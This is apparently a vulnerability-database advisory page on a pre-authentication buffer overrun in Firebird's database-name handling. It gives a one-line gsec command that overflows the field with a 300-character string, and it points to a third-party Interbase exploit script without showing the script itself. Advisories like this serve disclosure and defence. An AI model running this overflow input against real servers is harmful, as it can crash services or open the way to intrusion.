Firebird Remote Pre-Authentication Database Name Buffer Overrun Vulnerability

info
discussion
exploit
solution
references

Firebird Remote Pre-Authentication Database Name Buffer Overrun Vulnerability

The following example is available:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever

An exploit (priv8ibserverb.pl) that can target Borland Interbase 7.1 SP 2 and lower has been made available by Priv8security.

/data/vulnerabilities/exploits/priv8ibserverb.pl